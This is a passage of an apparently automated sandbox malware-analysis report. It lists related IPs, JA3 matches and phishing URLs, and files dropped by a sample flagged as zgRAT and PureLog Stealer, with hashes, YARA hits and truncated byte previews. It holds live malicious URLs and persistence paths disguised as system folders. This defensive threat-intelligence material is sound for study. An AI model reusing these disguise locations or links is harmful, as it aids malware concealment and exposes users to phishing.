                                                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 5.42.98.74
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 5.42.101.62
                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttp://boot.uleif.comGet hashmaliciousUnknownBrowse
                                                                            • 34.117.59.81
                                                                            https://lessonfulladvocating.z19.web.core.windows.net/Get hashmaliciousAnonymous ProxyBrowse
                                                                            • 34.117.77.79
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 34.117.188.166
                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 34.117.188.166

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttp://url5730.bkb-tours.com/ls/click?upn=u001.RGHmK1hbhRj1emqWdiNhLSLfhiHa5Xgj2PgdNFABoTzAEieA-2BAi72IlbwekEjzmy-2Bbvyjc6OaRM0j3Y4D96jZw-3D-3DG4Tq_wXBdKYou10O603QUzohLrBXWU3YfNwQigQmNAZXWbchq1WxjhMmweu-2FsutHjCUOKgUsL1AEPO-2F1jqLGA03IzQNq4MlBckGxqkEdgu9HqRVlCmnJ85n6wm-2BzvOUq0BPDZXr3-2BluL3-2BDQeHC-2FJZEnOA97FZtVYoDRbgfFeAz8yxoNTU22tvz2JvclHgGtf89SHnjWf9Y4A7r9zOGlPW5-2BVo7wIOqFAMRi9gye4bfLDSU3bIlpe30QNdbCxMefROgxhIvDYCDpKvM0M1pyQuOf8-2FUv9F2qHTHfddQ0u9GJkv7AlxRLbrzO3CG9v2UgkFfULX-2FtaQHUZePeY1INl-2Ft8YWAmD34DRvO7PgOFYUtOHqQc142SVia-2B-2FfcNe-2B-2B1zBlTQ9BN7px54JgZqdkTrLJ8R7Gq78HB-2BrMaRq6RIPVU5xXMCh0hZyKktj6WmBkGu7BBJluAUqE6teQaLicI5acYsjVgsULcigN16VLspLLTfrEjIYuLuQyBjbdTUwkD51X0Waw5zxTpt24hpfPUx5A-2BA-2By5-2BZ9ocOnRbMF7M9MxOy-2Brhoe3cZnH2UdsDnEx5xGprXRBR3ASOpwYm7R9WwhkNlGOXWldZzrIKdhsYYbAbbYOOHH9WeqrWWoAhcKT4soJLl-2F91D78WyflRx6ltvfE0uzNnG7n2zMVOjZWqybChHvbVX2QPCYYbqvz8LfnR745-2BmZg1D4XRCJJ5710Tt-2BtEfNlyxu9OGFgsIZkJt7TvcesWWbtV-2Fs1WKWvJNdRvMj8hMSbwcRp-2BM69Fhor49ffRX3uqERmvbv-2Fw8RjCqwi5t0C7OT0lC6THc9pCVUXIPeNjVJkt7ARDRpbrMjcf0rfyMg-3D-3DGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            ATLANTIC STAR - VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            tut.batGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            Audio.wavqvc.com10098.htmlGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            bostonbeer.com 4343988690.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81
                                                                            024.xlsx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                            • 149.154.167.220
                                                                            • 34.117.59.81

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\Desktop\ArFrORkS.loglv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                FMd6ntIhQY.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    fdsN8iw6WG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      I0xP0G2l1W.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        5Aw2cV5m0c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              BdYcIFnY2J.exeGet hashmaliciousDCRatBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\79ebd4b63302a4

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (898), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):898
                                                                                                Entropy (8bit):5.895132336130895
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YDkzL/0IPPzksV8uB/uHqG9WzWdnTICnfqq5EwJTECA+9/Xf+ok3q18:YDgBju+W1Tln/Ew1ECA+xXf+Dy8
                                                                                                MD5:1BDDE5E3CFE1A1E8853A4D6BC4B23147
                                                                                                SHA1:482A3C2E0774A5BD1B75F43D43E8F33E303759D1
                                                                                                SHA-256:CA3EDE5B5A950FB371838D9F82EFD7025F979FF65421E9827B3BAE391420C936
                                                                                                SHA-512:7E3680745F9A676F04AB4846E2F593C0A0B95AB83FF2C5FEC2FC7848ACB1D816AE35A075E02AD8C80A9305AB4784BA11BBE310FC15507CB4C37FE4A8964F829D
                                                                                                Malicious:false
                                                                                                Preview:p56qCK1Cp8A1gpWPdhGFYAbJf2DedknrP7BvvufgreA8w0fg7ruzWTfoewLKGWjEUTmjolesCkX3AcWoXhhvzyU5cWQ8iUaU55odO61VNCww5moBZgwizyPg8qHSUfKrJD8Fy3abqLhxBi90sPiCi1eGqHfhyjBr2Fm2ojNgGV2oQbeZqRjF7HJSi1ZqX2mGKz555HMJBC5M800OmF0h95uu6UUwKgINtweagidjFaD5M6UrBKDSCEGOEL9lxZ8f3sdLWZrDlRcj2zi9Amv9c0LopPWVj2vpbiBddIVldAqumhVPnAlLn9CChyfGDWetfwHUyEf1QJgcKaCI3HriRkCbf86omPiGf7OzaBaiet4ddj2GwXM6o6b5upyzI1PBlZ7MMMs2qJDipj85Gz1OCmcjfTFuMland32Emp3kpUPf23PLr3tS9B887Yr3G7pEsaEwq3Sa6RjsW6qlE4DT2Ioc43GO8AdroLwczcexkSWsbQlArFyM4WLkwm2wxEc5x1DLKOwlaPtkv5AnSGh2LRwS9LqMkrAg0a4jNa0cSNwonly0lOerhjtgEuL8ijAsPMtUAaa2PEj8fIpYWzlWMT8RrYfdO24tMDYa1dzKymbc9uB6Ewls8og6Ocnm56nXJ0wctPg2Aahk1gR6XiYbQMvhgcMZ0NP18ESI8iNyQsshG5FrKqOXhLG7FO5QDGCxLqmwNI8yUjLheNblXePJ81Tw7VDtn6vJq4VaSSeBsaC8Ajd1xT3j12yTWzz2FOLYyB0j1ATE9NbizVwY1L6TCLSyGBDcdm6dOoJ9s49wAzjoaQeADaA3S1VmtCd060lXQ7TKMxq7LJTNmnXzhDZCmCLXSgPpbJ0KNMXc7UyQtCrJhIAFpnS3aivNw51phAgBTJ

                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@.................................p.#.K.....#.p.....................#...................................................... ............... ..H............text....#.. ....#................. ..`.rsrc...p.....#.......#.............@....reloc........#.......#.............@..B..................#.....H...........X.......p...l...a....#......................................0..........(.... ........8........E........9.......8...8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{w...:....& ....8........0.......... ........8........E........*...S...........8.......... ....~....{....:....& ....8....~....:.... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....~....{....:T...& ....8I.......~....(J...~....(N... ....?*... ....~...

                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74ad5aab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.6585684544353494
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:xz/SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:xz/aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                MD5:84FD141814258B7EF8CFCA3B8653A72B
                                                                                                SHA1:09D196D30BF72380FBE0C1951A64C0C24D558646
                                                                                                SHA-256:E72C611F5E4F02987DCBE5D5FF98484CB7245FE60858026795AD2BD97171FC18
                                                                                                SHA-512:706C5A31D3CB5363DDC7DB8E97725D869FC330B4FF7FAC157A53FCFAEA44E7EB2BF969C46956DF519AE6EE99AA46F891259B03BDC8DACD0B11C6C4528524E150
                                                                                                Malicious:false
                                                                                                Preview:t.Z.... ...............X\...;...{......................0.z..........{..&%...|+.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................'&%...|K...................U"&%...|+..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Recovery\24dbde2999530e

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (680), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):680
                                                                                                Entropy (8bit):5.89693201530972
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:zDs7LgH4a8AOjYIMgZF6VWSVcADAsn8m+RgLNPgruzO0CJ5vqVFPn:cn7hj5F6sXgL9grmqqVRn
                                                                                                MD5:7024CB3FE729C4DCB0124D961CC7C19F
                                                                                                SHA1:5490E135CD96BF89A31BAD79D4B18DEE69D8907D
                                                                                                SHA-256:4A35E7C88264E6882083A2546FD4E98B496571851A60F8F4CD2946A70786AE2D
                                                                                                SHA-512:72757D7508CB950DF4FF6175758F655A6D89A287EDB436035A4B4398C0E094F0FDA479018E81DA69697DE0AF33A15D5DC61BC4D907DA292F559073CD8B4D813A
                                                                                                Malicious:false
                                                                                                Preview:PvMERfNYFOOCzr4jEyOQdtuSDUGWcM0EZUFRnue4TCCX8jE51q0mfvMfB3B6Z153YJmemn5TTT6brWUdQKfwVNioIkQusifcHJ9y6jTOugSMyuyoihpPVIiKk8VCWLlvyeUhXggq0RCy5WzXvlLK2PG8lyO8NR1i5gYUaQRCB8YEGtPOI8QvAa3iXV6iRiciad2Z7e6fTIJ30C21j90PBGifn06FTtucg0om1zQnBvb1QArVdF9SrNhT4XwHi1LkXqXAXPAtsMOQprOmIllOtcvTSUrdDJFJk0dkmq8NEPjf8RoNIJ86P6055EsChgqjGEqyNo9cmXJe3PUBqeV4KI4n9ioi85qij9Y4lzAeJgT1wWCptrWDLwZ8JCyo9aerrl531Za0d1uoyC0ng8zRimXxkZuiBVesBmKLbIxUQfjUBvJHLLIAlNIENITbo1zHWCmM1pMXLeADDDvzQnXzNdGydF7TzVqZqb79I7Qf8uzHNFBKWdLBd9425ytvs3hzykWlFvqTW10co8kXEw6VKo6qhEDTOexFNATnsaEkx2olJbO6NVr57LpJnqDBsWE2EvPnp7oosViRAUhF0GG2x2IBUK9CWD2axvhXMkRPqCMlnXITJ7KlQMFLmOSf8mRocIdOwJ3Pz0LupgX7Bp3Y2RJlqWv7RwREuiIe44g9

                                                                                                C:\Recovery\79ebd4b63302a4

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (630), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):630
                                                                                                Entropy (8bit):5.87542376712451
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:VeKWrFW4gsFWbpy8ZxNkWrOB1NmPsK15+T3g1O/ezt7yXH9L:U3rw4gs58ZHhaDQPj15+T34Weo
                                                                                                MD5:B85462C0FCA1337755B7424ED26863CD
                                                                                                SHA1:C5ADDA726EE7AF2EC97E445FBEE24F8AE02370AA
                                                                                                SHA-256:5460E5B4531BC7BB82B5A553CEB4CB3E37F4BEF5CE0BEED28804FE75A8AF9832
                                                                                                SHA-512:FAAF79DE154CBE2DD8E10B8A4E9F7BF182EA59DD636B8BB027C123EF63C8A19A27EBD02E51EAB241106F979704CEB308E4643D65A9240FDE5C210166C883B775
                                                                                                Malicious:false
                                                                                                Preview:CaTrEitXG8N4bxMnGyX5AM9AqJOUyFirCGg0HFTCYhVDiGuZBnotExm0bSB4UZjBZf1URWfAeVgd05cjZySLbznPepYyEZs98UoDPZIpHnOtQJ9f0bffGXkk1m0l7r6FmgegRYU9qnExk48Vq37n3M3luDLmjgrZrJGuocObGfycSw97ne5EuSLan3wNNraK6pGayOrNofhXXbS7EO9EknpY7pHvqAOYFognqiIZxrZOvyCLkyJ8sVjS9rdIG5goRISt4oQfGjR3ObnJm5K11QqtENn9FAS2Kv6nfTQ6hn2IEqEiDTfLuowAcjorBRaGRZsdeAnToOUOYhoXJF5veHHf85L6pj4QMw1p8kEDqMggUim54Qh5VplJRMeizqoFTEBmp8ZiA1ERkkLaTPCYC84hKsXwFfO9ibMQgAP5185ekUjrBEPjoPDUJeb7kncenFsIY43S9GgDDa7zIquBQpVSY2HCiSVOfa1flaTGL6jis9Qtgmy42bO7tZufx1trvShnjcNsXn0TGxjYlXf6eaWEL3vLqxTTN2xacnKEYGgOl416zV4ZVxMU6dbpqCCkUgGNAJ68MahY4HcRBzVU238Zpcd9LeYWE63Fxn5qY6N5PyayAKn1qr

                                                                                                C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@.................................p.#.K.....#.p.....................#...................................................... ............... ..H............text....#.. ....#................. ..`.rsrc...p.....#.......#.............@....reloc........#.......#.............@..B..................#.....H...........X.......p...l...a....#......................................0..........(.... ........8........E........9.......8...8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{w...:....& ....8........0.......... ........8........E........*...S...........8.......... ....~....{....:....& ....8....~....:.... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....~....{....:T...& ....8I.......~....(J...~....(N... ....?*... ....~...

                                                                                                C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Recovery\WmiPrvSE.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@.................................p.#.K.....#.p.....................#...................................................... ............... ..H............text....#.. ....#................. ..`.rsrc...p.....#.......#.............@....reloc........#.......#.............@..B..................#.....H...........X.......p...l...a....#......................................0..........(.... ........8........E........9.......8...8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{w...:....& ....8........0.......... ........8........E........*...S...........8.......... ....~....{....:....& ....8....~....:.... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....~....{....:T...& ....8I.......~....(J...~....(N... ....?*... ....~...

                                                                                                C:\Recovery\WmiPrvSE.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Users\Public\Videos\79ebd4b63302a4

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):181
                                                                                                Entropy (8bit):5.711623775076942
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Gj8h3WqDSw95Qsk1V7svonmSKxUWtH1G58o3U/R3jmMetIeO8g+AO5KrXTahV:JlWmO5FFfWzGGoktm9t+YsahV
                                                                                                MD5:E644D4200BA085D49A1BBBC391555A27
                                                                                                SHA1:9A4C09DCBE6339C1586CAD600F1981F1BF66BC1F
                                                                                                SHA-256:E862343DED7D246BF3CB37DF99A94DA41D012B1AF1A6F5023767D6CBC703B758
                                                                                                SHA-512:218C1DB17964026C58E0DFEA59405646038FF2237498A794F8558DF02BDFD11EDA012DAD08FE747C2E5C4C3D98C55FBE2D73C909420848EC79AD8F2EB3511C7F
                                                                                                Malicious:false
                                                                                                Preview:aS8EXIot5lUNMy5wHVoGou1rcOf3pucYXiAFuElS9kS5LlETAAelqzgpbRlImvELI5znx0BCuWHEc5f1KM3oQ1shCVodddqNgHwQvbfJ8c1UrcNfvu7a1Z4RNRlcLiiRp3hVIPFtqtqyAYzkHIstfPWHMfDezC7a3koy42XfoOtIsGQybAVD0

                                                                                                C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................#...........#.. ....#...@.. ........................$...........@.................................p.#.K.....#.p.....................#...................................................... ............... ..H............text....#.. ....#................. ..`.rsrc...p.....#.......#.............@....reloc........#.......#.............@..B..................#.....H...........X.......p...l...a....#......................................0..........(.... ........8........E........9.......8...8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{w...:....& ....8........0.......... ........8........E........*...S...........8.......... ....~....{....:....& ....8....~....:.... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....~....{....:T...& ....8I.......~....(J...~....(N... ....?*... ....~...

                                                                                                C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe.log

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
